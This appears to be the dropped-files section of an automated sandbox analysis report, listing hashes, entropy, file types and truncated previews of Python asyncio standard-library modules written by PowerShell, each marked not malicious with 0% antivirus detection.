                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import functools..import inspect..import reprlib..import sys..import traceback....from . import constants......def _get_function_source(func):.. func = inspect.unwrap(func).. if inspect.isfunction(func):.. code = func.__code__.. return (code.co_filename, code.co_firstlineno).. if isinstance(func, functools.partial):.. return _get_function_source(func.func).. if isinstance(func, functools.partialmethod):.. return _get_function_source(func.func).. return None......def _format_callback_source(func, args):.. func_repr = _format_callback(func, args, None).. source = _get_function_source(func).. if source:.. func_repr += f' at {source[0]}:{source[1]}'.. return func_repr......def _format_args_and_kwargs(args, kwargs):.. """Format function arguments and keyword arguments..... Special case for a single parameter: ('hello',) is formatted as ('hello')... """.. # use reprlib to limit the length of the output.. items = [].
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14638
                                                                                                    Entropy (8bit):4.473219187208677
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:RH8T77Dm/ndJtDT7umUctWcOXOK4Uf6YRFTR/iNxzLdefQ9c0l+:Fwa/ndJtxZtWcy4k5E/g2Do
                                                                                                    MD5:8AB6FC3745541B13A1CA4C6A733D8053
                                                                                                    SHA1:7CF86F99C9D0EDFC09CE027CBEFE6A316B077FB2
                                                                                                    SHA-256:793329A7A9BF2520F980C064F4E19E27928D112A8534B8094C5C4BF7DDEC97E7
                                                                                                    SHA-512:4BB342E641C8B083C725FA90B5009809AEBBDB743F9495FAAC7BB97C7ABBED8AE645885E0198A6CE8EA402BC720EEDAD2628E846E946728162562E18EF299437
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""A Future class similar to the one in PEP 3148."""....__all__ = (.. 'Future', 'wrap_future', 'isfuture',..)....import concurrent.futures..import contextvars..import logging..import sys..from types import GenericAlias....from . import base_futures..from . import events..from . import exceptions..from . import format_helpers......isfuture = base_futures.isfuture......_PENDING = base_futures._PENDING.._CANCELLED = base_futures._CANCELLED.._FINISHED = base_futures._FINISHED......STACK_DEBUG = logging.DEBUG - 1 # heavy-duty debugging......class Future:.. """This class is *almost* compatible with concurrent.futures.Future..... Differences:.... - This class is not thread-safe..... - result() and exception() do not take a timeout argument and.. raise an exception when the future isn't done yet..... - Callbacks registered with add_done_callback() are always called.. via the event loop's call_soon()..... - This class is not compatible with the wait() and as_comp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19580
                                                                                                    Entropy (8bit):4.3769687674436195
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:j89mYtua1IhkzLJInU/iI7xyV+Wea/k7mt4YeJV8PxbLosoqL/Nl/1BbW5ZxZHZn:j892ViBVIoui5b2sC/my+nJvlWJEjgi
                                                                                                    MD5:4B4F06D1A131B50F581E752F09394C20
                                                                                                    SHA1:733455667ED37D57E4FAE0293416EE51655978A2
                                                                                                    SHA-256:8676F43DC76B49D66DC63B907DD2367E7B35FE5E7CE775F816EE306B70521812
                                                                                                    SHA-512:73BB39573E6E36B166597B08CFF9B39E70B8024C8303A5E89D8C238C394DACE5621F869F25CB2D368023CE2E382A29B615F98E55B328B85E8C073FB9949F4F0B
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Synchronization primitives."""....__all__ = ('Lock', 'Event', 'Condition', 'Semaphore',.. 'BoundedSemaphore', 'Barrier')....import collections..import enum....from . import exceptions..from . import mixins....class _ContextManagerMixin:.. async def __aenter__(self):.. await self.acquire().. # We have no use for the "as ..." clause in the with.. # statement for locks... return None.... async def __aexit__(self, exc_type, exc, tb):.. self.release()......class Lock(_ContextManagerMixin, mixins._LoopBoundMixin):.. """Primitive lock objects..... A primitive lock is a synchronization primitive that is not owned.. by a particular coroutine when locked. A primitive lock is in one.. of two states, 'locked' or 'unlocked'..... It is created in the unlocked state. It has two basic methods,.. acquire() and release(). When the state is unlocked, acquire().. changes the state to locked and returns immediately. When the..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131
                                                                                                    Entropy (8bit):4.37276371888401
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:W5DQIMeHnoHIgXAgCrovYSNAFWAX+k++SoRKt1zC2QK466AGB:8QIbnoHXe+bPAukNSoRKtQW6Au
                                                                                                    MD5:07687A8E3B30B3B320A3B3164812E3B1
                                                                                                    SHA1:04A117C1275B17E12EC9527F49CA74399F9FFB28
                                                                                                    SHA-256:72433D0D5A4205B74EF4FF95CD3E1C8D98960A58371E5546698A3A38F231058C
                                                                                                    SHA-512:E2C8DE755A6281245B0A25BA20F4956EBDBB83AD375DEC62A93310C7D5F1BF12B10A7467807272B7323EB5D0C9CF3771421100B588A78945EEB972D768ED52FA
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Logging configuration."""....import logging......# Name the logger after the package...logger = logging.getLogger(__package__)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):502
                                                                                                    Entropy (8bit):4.264038214993239
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2Ajxj4XvQtLTFL6Niuh2AakLv1G/HtpNDeidJKwQMTJy9MBXcAKKPksQBd8clRYR:20t1eh0DqvkX9KRfuPLDclRYR
                                                                                                    MD5:592AD5057035FBE84AF5222A68FD2D7E
                                                                                                    SHA1:C7FCBB8D67F25C9B9C46639EC1D0B78A2DE8B102
                                                                                                    SHA-256:F5055BBC8622C99F91EF58024D4655209C904AB43F11498ADFB6218C127F9946
                                                                                                    SHA-512:341D4C1B301632B51DD0F8B10F298745FC75994ABCC8C75F962C96BC155A4302A60F79998FDF2F927705E3EA060FEA6686151DF9094CC72025D5A4D2692A3599
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Event loop mixins."""....import threading..from . import events...._global_lock = threading.Lock()......class _LoopBoundMixin:.. _loop = None.... def _get_loop(self):.. loop = events._get_running_loop().... if self._loop is None:.. with _global_lock:.. if self._loop is None:.. self._loop = loop.. if loop is not self._loop:.. raise RuntimeError(f'{self!r} is bound to a different event loop').. return loop..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34280
                                                                                                    Entropy (8bit):4.238022486766239
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:H4dU5QRJLvasHDpbMaZrfo2T/qnmaT3sqHBBtKyR:Yi5kNppNfo8aT3sI1R
                                                                                                    MD5:19CDC88E6AC4FFD34F96EDAF4439F2CD
                                                                                                    SHA1:F443203F24A36ECE66837FDC46BD876E43CEA39C
                                                                                                    SHA-256:6BC9F7FB8664D7E20F2C56241B52CC2B0B358AE207D22E5AFFCC10AB333A3F65
                                                                                                    SHA-512:00F13DC2F6FDC413CCB33D33CF1A1493B5165421BED7E46BC02C960920A98576F6905E227D8069EFC52679D07086AEA1B74F6138FFA9930777A77468D40D8884
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Event loop using a proactor and related classes.....A proactor is a "notify-on-completion" multiplexer. Currently a..proactor is only implemented on Windows with IOCP..."""....__all__ = 'BaseProactorEventLoop',....import io..import os..import socket..import warnings..import signal..import threading..import collections....from . import base_events..from . import constants..from . import futures..from . import exceptions..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger......def _set_socket_extra(transport, sock):.. transport._extra['socket'] = trsock.TransportSocket(sock).... try:.. transport._extra['sockname'] = sock.getsockname().. except socket.error:.. if transport._loop.get_debug():.. logger.warning(.. "getsockname() failed on %r", sock, exc_info=True).... if 'peername' not in transport._extra:.. try:.. transport._extra['peername'] = sock
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7173
                                                                                                    Entropy (8bit):4.508690129802189
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:GvIrPBEBCe7pXv83jwbtB2S1KnUB/MB2E505cFj:GvsqNVETwmSwU5hE5Z
                                                                                                    MD5:AA57F822D953D524C717845CF040C7A8
                                                                                                    SHA1:4A044088F18490FD5E29F132BA5EC1224C723BB9
                                                                                                    SHA-256:66038B46A3D99B358166A061B9D5E9486CDDB9626D84C34F343640BB0D0EEC0A
                                                                                                    SHA-512:A3FB50B69AA2523C17AE04B7562B42EBE2FB5F9EA5B23403EE9D92059C7B23727F30867FA561EC7E165D21B77C6F84F0024972D7335ADB09245198935985234B
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Abstract Protocol base classes."""....__all__ = (.. 'BaseProtocol', 'Protocol', 'DatagramProtocol',.. 'SubprocessProtocol', 'BufferedProtocol',..)......class BaseProtocol:.. """Common base class for protocol interfaces..... Usually user implements protocols that derived from BaseProtocol.. like Protocol or ProcessProtocol..... The only case when BaseProtocol should be implemented directly is.. write-only transport like write pipe.. """.... __slots__ = ().... def connection_made(self, transport):.. """Called when a connection is made..... The argument is the transport representing the pipe connection... To receive data, wait for data_received() calls... When the connection is closed, connection_lost() is called... """.... def connection_lost(self, exc):.. """Called when the connection is lost or closed..... The argument is an exception object or None (the latter.. meaning a regular EOF is receive
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8218
                                                                                                    Entropy (8bit):4.355264320169499
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ZihNcb/YAsKXSWefpst8gcyTD6NKN2q2p9As/g2pbq8UXZbFLLBk3:ucbQfKX/6pXOXe+AL2ZJs
                                                                                                    MD5:AA07F295C880EFCF11114F912DA15556
                                                                                                    SHA1:15684100DC5BD09ED682FD4DD3F16FAB106F1500
                                                                                                    SHA-256:77EA57D6C140F46FF1740FE0948894E43A77D6CFD3F03720DBDC7F5B72F03127
                                                                                                    SHA-512:621441FAFE32F5C10461734286BA330FAD6A65473CE8CCC90080491EEB186DA99D28FDA8F48361A241388FFE061B0E545F8E8A32742295582A30FCDF97264348
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:__all__ = ('Queue', 'PriorityQueue', 'LifoQueue', 'QueueFull', 'QueueEmpty')....import collections..import heapq..from types import GenericAlias....from . import locks..from . import mixins......class QueueEmpty(Exception):.. """Raised when Queue.get_nowait() is called on an empty Queue.""".. pass......class QueueFull(Exception):.. """Raised when the Queue.put_nowait() method is called on a full Queue.""".. pass......class Queue(mixins._LoopBoundMixin):.. """A queue, useful for coordinating producer and consumer coroutines..... If maxsize is less than or equal to zero, the queue size is infinite. If it.. is an integer greater than 0, then "await put()" will block when the.. queue reaches maxsize, until an item is removed by get()..... Unlike the standard library Queue, you can reliably know this Queue's size.. with qsize(), since your single-threaded asyncio application won't be.. interrupted between calling qsize() and doing an operation on the Queue..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7374
                                                                                                    Entropy (8bit):4.447281372761197
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:W9Qus+1IZ8S3+eA1NHFh8p9w+p/Hya4ALzTaIhqN:qqOIZa7lKaCZzTI
                                                                                                    MD5:53F58587D7AD16443DA53C0D7F45629C
                                                                                                    SHA1:EE635CEEB130CF537D1C0EDDAF40F5BFC15DD234
                                                                                                    SHA-256:ED1A56F37A46004F6BBB4FE597EEA239EA33911EF0C1505903A65F0F30ADE110
                                                                                                    SHA-512:93812F5CB92E046313989DA87D718A0B60D586E8E2A73663BE7D9BCA0B438DA26A6581E80CD07EBB4C9B90BD8CC1A7302B700DD7428CB783D811C295761E2150
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:__all__ = ('Runner', 'run')....import contextvars..import enum..import functools..import threading..import signal..from . import coroutines..from . import events..from . import exceptions..from . import tasks..from . import constants....class _State(enum.Enum):.. CREATED = "created".. INITIALIZED = "initialized".. CLOSED = "closed"......class Runner:.. """A context manager that controls event loop life cycle..... The context manager always creates a new event loop,.. allows to run async functions inside it,.. and properly finalizes the loop at the context manager exit..... If debug is True, the event loop will be run in debug mode... If loop_factory is passed, it is used for new event loop creation..... asyncio.run(main(), debug=True).... is a shortcut for.... with asyncio.Runner(debug=True) as runner:.. runner.run(main()).... The run() method can be called multiple times within the runner's context..... This can be useful for interactiv
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49562
                                                                                                    Entropy (8bit):4.295782081297384
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:QSXM1ILQh35d/lG+YKFjq/R4NtL1xEY8A3szehU70O+2:QS0CU5rNYQq
                                                                                                    MD5:CD29D4B9E2D7DDCD5F5147B7FD297298
                                                                                                    SHA1:2341A3DD3A199CC57F0D1993616EC1D675B2DE5B
                                                                                                    SHA-256:65AA8EE7E00C9AF60158A1059C01F36B028D133BF8DDC5E2E55CDCCB76A9ED86
                                                                                                    SHA-512:775FE3736B3960DBA2E435765EEAD3A8BB72B670086F6B6E056528006913021BC69C800FCCA793673BF1C30BDA614E2ACD872E07C1633515000C0FBE7B8CD985
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Event loop using a selector and related classes.....A selector is a "notify-when-ready" multiplexer. For a subclass which..also includes support for signal handling, see the unix_events sub-module..."""....__all__ = 'BaseSelectorEventLoop',....import collections..import errno..import functools..import itertools..import os..import selectors..import socket..import warnings..import weakref..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import base_events..from . import constants..from . import events..from . import futures..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger...._HAS_SENDMSG = hasattr(socket.socket, 'sendmsg')....if _HAS_SENDMSG:.. try:.. SC_IOV_MAX = os.sysconf('SC_IOV_MAX').. except OSError:.. # Fallback to send.. _HAS_SENDMSG = False....def _test_selector_event(selector, fd, event):.. # Test if the selector is monitoring 'event
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32665
                                                                                                    Entropy (8bit):4.448464309868453
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ab9lsu9k/6CTlE/B/AgUYi00Q1UT/AuJBhzX+Shn04o/dCMcc02F/8NNdbpap/7k:ahTf1cZ0VxoIz1jp0TxuKCVmsxg
                                                                                                    MD5:B0372CDBEE5EEA08A89E28C414102648
                                                                                                    SHA1:5A43369B6A50E9D377402C0484F8C3553E32FBD7
                                                                                                    SHA-256:C5C2475B3CF78EC6CC7538C7125B6704AE17EAD509E368CB500E4BA80EA5A6AF
                                                                                                    SHA-512:47AA88FED8C63651E3953E10726DEEAF328CCA668C37A9A77CAB3307941CAF68134E913BB90DE8079093F33EEAA178AF929DD8213E1CA2327E411045D3E99AF8
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Contains code from https://github.com/MagicStack/uvloop/tree/v0.16.0..# SPDX-License-Identifier: PSF-2.0 AND (MIT OR Apache-2.0)..# SPDX-FileCopyrightText: Copyright (c) 2015-2021 MagicStack Inc. http://magic.io....import collections..import enum..import warnings..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import constants..from . import exceptions..from . import protocols..from . import transports..from .log import logger....if ssl is not None:.. SSLAgainErrors = (ssl.SSLWantReadError, ssl.SSLSyscallError)......class SSLProtocolState(enum.Enum):.. UNWRAPPED = "UNWRAPPED".. DO_HANDSHAKE = "DO_HANDSHAKE".. WRAPPED = "WRAPPED".. FLUSHING = "FLUSHING".. SHUTDOWN = "SHUTDOWN"......class AppProtocolState(enum.Enum):.. # This tracks the state of app protocol (https://git.io/fj59P):.. #.. # INIT -cm-> CON_MADE [-dr*->] [-er-> EOF?] -cl-> CON_LOST.. #.. # * cm: connection_made().. # * dr: data_received()..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6141
                                                                                                    Entropy (8bit):4.389643633306416
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:r/40VDFh1NO3QFFBUQJxAHsI/5QGG/1a4bN4u8MGomMMhetgqldcEtHCF3hUkwTB:dV1BEBQjaQWKtldcEyxUkwt
                                                                                                    MD5:BCA378D3DB917FB79E03181E278C23AD
                                                                                                    SHA1:EF2CD76DD08000173CA5EDA494DB4F728066BBDC
                                                                                                    SHA-256:18785BF43A6B21A235DA704A60CAF28232F6E57C56E3EB81D01BB50C5B9D4858
                                                                                                    SHA-512:CCB0F5C3EB272A4404E467FB5789A7D32D686794530BFAD1A07FFA934D9B497368ABC5569BB97D0BB323BB78A8E74CC413768CB6D8619FCE3E8D2A49FB695008
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Support for running coroutines in parallel with staggered start times."""....__all__ = 'staggered_race',....import contextlib..import typing....from . import events..from . import exceptions as exceptions_mod..from . import locks..from . import tasks......async def staggered_race(.. coro_fns: typing.Iterable[typing.Callable[[], typing.Awaitable]],.. delay: typing.Optional[float],.. *,.. loop: events.AbstractEventLoop = None,..) -> typing.Tuple[.. typing.Any,.. typing.Optional[int],.. typing.List[typing.Optional[Exception]]..]:.. """Run coroutines with staggered start times and take the first to finish..... This method takes an iterable of coroutine functions. The first one is.. started immediately. From then on, whenever the immediately preceding one.. fails (raises an exception), or when *delay* seconds has passed, the next.. coroutine is started. This continues until one of the coroutines complete.. successfully, in which case
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28389
                                                                                                    Entropy (8bit):4.334298379691788
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xqOmlvrbxYaOmA8nZ7u3EVo//iUhu0UDYCHkJhqhXWFNTicMO:xq11bmaOTkZc/PhvJhyXkTiPO
                                                                                                    MD5:CF4E6B898027D807CB3864EDC840A469
                                                                                                    SHA1:37BC27CF5FA1E86A4C82E9497959E5772F6D6131
                                                                                                    SHA-256:1BC43CFFAD3DC2422811017788BCF394AE4269D4C6EB66295FDBCA580015C482
                                                                                                    SHA-512:4EBE2D6D6C9A773D6CAAE703D6E24B8C30ED31CA977919A69E8722EB177EC30BDAD08AE7A4CA44D5EBFD89272B030D9D9E3568465BA6683E605D7CA4254471A2
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:__all__ = (.. 'StreamReader', 'StreamWriter', 'StreamReaderProtocol',.. 'open_connection', 'start_server')....import collections..import socket..import sys..import warnings..import weakref....if hasattr(socket, 'AF_UNIX'):.. __all__ += ('open_unix_connection', 'start_unix_server')....from . import coroutines..from . import events..from . import exceptions..from . import format_helpers..from . import protocols..from .log import logger..from .tasks import sleep......_DEFAULT_LIMIT = 2 ** 16 # 64 KiB......async def open_connection(host=None, port=None, *,.. limit=_DEFAULT_LIMIT, **kwds):.. """A wrapper for create_connection() returning a (reader, writer) pair..... The reader returned is a StreamReader instance; the writer is a.. StreamWriter instance..... The arguments are all the usual arguments to create_connection().. except protocol_factory; most common are positional host and port,.. with various optional keyword arguments followin
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7966
                                                                                                    Entropy (8bit):4.220981877085878
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:K4sU1b4rU9oQesQ+rshTe2ihT/xPNGMcfOyWqnUCqHS0Nym0NQo+3LtgL63LGgLv:x6J3OT/Ls/W/y9mBoa5yOCyv
                                                                                                    MD5:D274512CF8A00C6ADB71CB250612EBF4
                                                                                                    SHA1:D094C446255D1DD1F36CD8DC8EE0102236C5ED05
                                                                                                    SHA-256:2C7A0E549992A9731EFCF3F1A06FBF734DB90B54D9734D2708953B722BBD533C
                                                                                                    SHA-512:E6359D4D158C8006CE0128FC9BA17CD8F6B53F9B84FAF6B70909C3A246559C6E2EE7796711238D38642486F55CE246179D705DCBCD3F0BABB759D58D0EFC68DF
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:__all__ = 'create_subprocess_exec', 'create_subprocess_shell'....import subprocess....from . import events..from . import protocols..from . import streams..from . import tasks..from .log import logger......PIPE = subprocess.PIPE..STDOUT = subprocess.STDOUT..DEVNULL = subprocess.DEVNULL......class SubprocessStreamProtocol(streams.FlowControlMixin,.. protocols.SubprocessProtocol):.. """Like StreamReaderProtocol, but for a subprocess.""".... def __init__(self, limit, loop):.. super().__init__(loop=loop).. self._limit = limit.. self.stdin = self.stdout = self.stderr = None.. self._transport = None.. self._process_exited = False.. self._pipe_fds = [].. self._stdin_closed = self._loop.create_future().... def __repr__(self):.. info = [self.__class__.__name__].. if self.stdin is not None:.. info.append(f'stdin={self.stdin!r}').. if self.stdout is not None:.. info.a
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8987
                                                                                                    Entropy (8bit):4.141311182208331
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:o4H+PTnEW4g5VseACDe2BeBstz7B18xEcUDJyxu9rUQfqeWLeh/e:8fzjACCetpO5UR9rUQSo/e
                                                                                                    MD5:DCC71CF7370642651F465B65EB1A2A52
                                                                                                    SHA1:AC3A1B0F3E66BD97F51AAB71D6331DCEC33552E2
                                                                                                    SHA-256:2EBD3A292448AB0058FD7558A63D578B3156CC53DDDFB8755A700EEE9EAAE354
                                                                                                    SHA-512:7E11F577BAC258F1F26395AF4C48F31982C898DE120FB659F64AB202408B3964EEEA6E8A795DB62520BDBBFF0BF5A5F6AA307F6181FB9625EBA6EA545A332B7B
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Adapted with permission from the EdgeDB project;..# license: PSFL.......__all__ = ("TaskGroup",)....from . import events..from . import exceptions..from . import tasks......class TaskGroup:.. """Asynchronous context manager for managing groups of tasks..... Example use:.... async with asyncio.TaskGroup() as group:.. task1 = group.create_task(some_coroutine(...)).. task2 = group.create_task(other_coroutine(...)).. print("Both tasks have completed now.").... All tasks are awaited when the context manager exits..... Any exceptions other than `asyncio.CancelledError` raised within.. a task will cancel all remaining tasks and wait for them to exit... The exceptions are then combined and raised as an `ExceptionGroup`... """.. def __init__(self):.. self._entered = False.. self._exiting = False.. self._aborting = False.. self._loop = None.. self._parent_task = None.. self._parent_cancel_requ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38427
                                                                                                    Entropy (8bit):4.4020695030500026
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:clsnnwmXK1AfPsj71FefeTMmYrKKPdIwwfxhR77K45CwdTf:Usn/OpxhR7735Cwp
                                                                                                    MD5:A77DD97821E0B50965BD586573560F15
                                                                                                    SHA1:E9EAAB6FD4AB465A9EFA6655A442FD61AC835D9F
                                                                                                    SHA-256:C9501733827182D5EAB6638EF7117367C5FE5DB0191E45BF96F9FAA463127E83
                                                                                                    SHA-512:6AF278ADA32497AC826F6A80C29379870462F85F05CE413E151C356C6940511A4E4899F94BED0DFC988C2F25C38D10C6A1CFAECAF1C7A79592EA537BD18D8DFD
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Support for tasks, coroutines and the scheduler."""....__all__ = (.. 'Task', 'create_task',.. 'FIRST_COMPLETED', 'FIRST_EXCEPTION', 'ALL_COMPLETED',.. 'wait', 'wait_for', 'as_completed', 'sleep',.. 'gather', 'shield', 'ensure_future', 'run_coroutine_threadsafe',.. 'current_task', 'all_tasks',.. 'create_eager_task_factory', 'eager_task_factory',.. '_register_task', '_unregister_task', '_enter_task', '_leave_task',..)....import concurrent.futures..import contextvars..import functools..import inspect..import itertools..import types..import warnings..import weakref..from types import GenericAlias....from . import base_tasks..from . import coroutines..from . import events..from . import exceptions..from . import futures..from . import timeouts....# Helper to generate new task names..# This uses itertools.count() instead of a "+= 1" operation because the latter..# is not thread safe. See bpo-11866 for a longer explanation..._task_name_counter = itertools.count(1).__ne
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):815
                                                                                                    Entropy (8bit):4.657768265178285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gpnQoNsLJHhQITtNaCiXm9PjkqjYcKTm3I3CGxu:gpnQoNwN7aFW9hj3CmYyG0
                                                                                                    MD5:0EBB52B3B39916EDEE1B1CE2805F0D5E
                                                                                                    SHA1:11600DD141A2A22C00F5A7E0A43F5916778E53AA
                                                                                                    SHA-256:60310C6E008F10C117388BA34811250134DC6FE4577031CDA37E8F9ADEA40920
                                                                                                    SHA-512:E8DF889521C85F7B2A3AB5DD21F3B3B87B3A254B289D7E80B9256A73B0204D19149FC92E5433CCFD3201223D03CEDAA45F56C8E9FD58E51FCAA0820079604188
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""High-level support for working with threads in asyncio"""....import functools..import contextvars....from . import events......__all__ = "to_thread",......async def to_thread(func, /, *args, **kwargs):.. """Asynchronously run function *func* in a separate thread..... Any *args and **kwargs supplied for this function are directly passed.. to *func*. Also, the current :class:`contextvars.Context` is propagated,.. allowing context variables from the main thread to be accessed in the.. separate thread..... Return a coroutine that can be awaited to get the eventual result of *func*... """.. loop = events.get_running_loop().. ctx = contextvars.copy_context().. func_call = functools.partial(ctx.run, func, *args, **kwargs).. return await loop.run_in_executor(None, func_call)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5489
                                                                                                    Entropy (8bit):4.611632288524656
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:FudZ4HtaQ70BqYE3+7Kd3wXBoaA3xEXcpuGtmn3l4yN0wsB2yPqc7n:RHf+7Kd3wXnA3mX2uGtmn3lSPPn
                                                                                                    MD5:7CE2EEC51B5A7D39673EECF93A57BD61
                                                                                                    SHA1:F5C4202317FDF7F6FE08B51382FEB9F11DD49C92
                                                                                                    SHA-256:0BEB692F463BB3C55382B32B4174E31C546B33257C14172C34DB1AD1DD269FF8
                                                                                                    SHA-512:4CABCD2DF65A45943920BC242EBD720E264A3F4427476B869713872E124C25D82889AFF82570B2AF3D45D26E90F03F83AA1EDC142853BF410474DB7DB32D73F4
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import enum....from types import TracebackType..from typing import final, Optional, Type....from . import events..from . import exceptions..from . import tasks......__all__ = (.. "Timeout",.. "timeout",.. "timeout_at",..)......class _State(enum.Enum):.. CREATED = "created".. ENTERED = "active".. EXPIRING = "expiring".. EXPIRED = "expired".. EXITED = "finished"......@final..class Timeout:.. """Asynchronous context manager for cancelling overdue coroutines..... Use `timeout()` or `timeout_at()` rather than instantiating this class directly... """.... def __init__(self, when: Optional[float]) -> None:.. """Schedule a timeout that will trigger at a given loop time..... - If `when` is `None`, the timeout will never trigger... - If `when < loop.time()`, the timeout will trigger on the next.. iteration of the event loop... """.. self._state = _State.CREATED.... self._timeout_handler: Optional[events.TimerHa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
